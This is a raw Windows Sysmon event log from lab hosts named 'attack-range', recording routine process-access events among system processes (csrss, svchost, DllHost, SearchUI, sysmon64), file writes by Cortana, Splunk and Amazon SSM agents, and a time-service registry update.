10:40:44.833{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.833{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.833{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366d9|c:\windows\system32\rpcss.dll+3bec2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.739{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.739{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.739{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.723{C8EA50B7-F2AF-6215-C200-000000003802}4300ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\59A4FKRV\microsoft.windows[1].xmlMD5=EA79B27D8890033A611F0F54AB21F7D2,SHA256=B6CCBFFFE5C21D5D6E721F0E68BB53A6D46748000FEBC7F01BF101B5F28652F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.723{C8EA50B7-F2AF-6215-C200-000000003802}4300ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\59A4FKRV\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.723{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.723{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.708{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C104-000000003802}4816C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+37396|c:\windows\system32\rpcss.dll+3df7d|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.708{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.708{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 23542300x8000000000000000285803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.442{C8EA50B7-F2AF-6215-C200-000000003802}4300ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\59A4FKRV\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.427{C8EA50B7-F2AF-6215-C200-000000003802}4300ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\59A4FKRV\microsoft.windows[1].xmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.411{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000285800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.411{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.192{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA0F8669352A0118FA0DAE1552F7530,SHA256=90D4A5514E7A92C11D9D56F7D1C9FAF19D0ECDF98BCBDB6FF17DB653084E5577,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:44.023{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-125MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.772{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000214888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 10:40:45.726{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a1-0xd051789d) 10341000x8000000000000000214887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F2D-6216-1204-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 